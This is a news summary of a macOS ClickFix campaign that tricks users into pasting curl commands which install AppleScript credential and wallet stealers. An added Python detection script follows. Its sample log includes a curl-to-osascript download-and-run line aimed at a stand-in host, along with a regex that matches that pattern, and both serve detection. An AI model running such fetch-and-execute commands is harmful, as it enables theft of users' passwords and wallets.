macOS ClickFix attacks deliver AppleScript stealers to snarf credentials, wallets

A sophisticated ClickFix social engineering campaign is targeting macOS users by tricking them into executing malicious AppleScript commands that steal credentials, session cookies, and cryptocurrency wallet data.

Key Points

  • Attackers use fake CAPTCHA prompts to trick users into pasting malicious curl commands into the macOS Spotlight search feature.
  • The malware harvests data from 14 browsers, 16 standalone cryptocurrency wallets, and over 200 browser extensions.
  • Stolen information includes Keychain passwords, session tokens, credit card numbers, and credentials for password managers like 1Password and LastPass.
  • The script creates a temporary directory at /tmp/xdivcmp/ to stage stolen data before exfiltrating it to an attacker-controlled server.
  • Newer versions of macOS, including Sequoia, now include security features designed to alert users when pasting potentially malicious commands into the system.
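As an added illustration (not code from the article or from The Register), the following script scans constructed process-execution telemetry for the two host-side indicators the summary names: a curl download handed straight to the AppleScript interpreter (osascript), and activity touching the /tmp/xdivcmp/ staging directory. Only the staging path comes from the article; the log format, usernames, the .invalid hostnames and the "curl piped into osascript" command shape are assumptions made for the example.

```python
import re
from typing import Dict, List, Set

# Host indicators taken from the summary above. The staging path is the one
# the article reports; the "curl piped into osascript" shape is an assumption
# about how a pasted curl command would hand its download to AppleScript.
STAGING_DIR = "/tmp/xdivcmp/"
CURL_TO_OSASCRIPT = re.compile(r"\bcurl\b[^|]*\|\s*osascript\b")

IND_DOWNLOAD_EXEC = "curl-piped-to-osascript"
IND_STAGING_DIR = "staging-dir-/tmp/xdivcmp"

# Constructed sample telemetry (not real logs). Assumed format, one event per
# line: "<timestamp> <user> <process> <command line>".
SAMPLE_LOG = """\
2025-06-01T10:00:01Z alice bash curl -fsSL https://verify.example.invalid/check | osascript
2025-06-01T10:00:02Z alice osascript osascript -e 'do shell script "mkdir -p /tmp/xdivcmp/"'
2025-06-01T10:00:05Z alice zsh ls -la /Users/alice/Documents
2025-06-01T10:00:09Z bob curl curl -s https://api.example.invalid/health
2025-06-01T10:00:12Z alice bash zip -r /tmp/xdivcmp/out.zip /tmp/xdivcmp/
"""


def parse_event(line: str) -> Dict[str, str]:
    """Split one telemetry line into fields; the command line keeps its spaces."""
    parts = line.split(maxsplit=3)
    if len(parts) < 3:
        raise ValueError(f"malformed event: {line!r}")
    ts, user, proc = parts[:3]
    cmdline = parts[3] if len(parts) == 4 else ""
    return {"ts": ts, "user": user, "process": proc, "cmdline": cmdline}


def classify_command(cmdline: str) -> List[str]:
    """Return the names of every indicator that matches a single command line."""
    hits: List[str] = []
    if CURL_TO_OSASCRIPT.search(cmdline):
        hits.append(IND_DOWNLOAD_EXEC)
    if STAGING_DIR in cmdline:
        hits.append(IND_STAGING_DIR)
    return hits


def scan(log_text: str) -> List[Dict[str, object]]:
    """Parse every non-empty line and keep the events that match at least one indicator."""
    alerts: List[Dict[str, object]] = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        event = parse_event(raw)
        hits = classify_command(str(event["cmdline"]))
        if hits:
            alerts.append({**event, "indicators": hits})
    return alerts


def users_with_full_chain(alerts: List[Dict[str, object]]) -> List[str]:
    """Users whose alerts show both the download-and-execute step and the staging
    directory; seeing both raises confidence well above a lone curl pipe."""
    seen: Dict[str, Set[str]] = {}
    for alert in alerts:
        seen.setdefault(str(alert["user"]), set()).update(alert["indicators"])  # type: ignore[arg-type]
    required = {IND_DOWNLOAD_EXEC, IND_STAGING_DIR}
    return sorted(user for user, inds in seen.items() if required <= inds)


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for alert in found:
        print(f'{alert["ts"]} {alert["user"]:<6} {",".join(alert["indicators"])}  {alert["cmdline"]}')
    print("users with full chain:", users_with_full_chain(found))
```

Running the block on the constructed log flags three of the five events and reports alice as the only user with both the download-and-execute step and the staging directory; bob's plain health-check curl is left alone. In a real deployment the same two checks would sit on endpoint process-execution and file-creation events rather than on a text blob, and the staging-directory match should be treated as a high-confidence signal on its own.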

Why it Matters

This campaign highlights the persistent danger of social engineering tactics that bypass traditional software defenses by manipulating user behavior. Organizations and individuals should prioritize updating to the latest macOS versions to benefit from the built-in protections against these credential-harvesting scripts.
Theregister.com, published by Jessica Lyons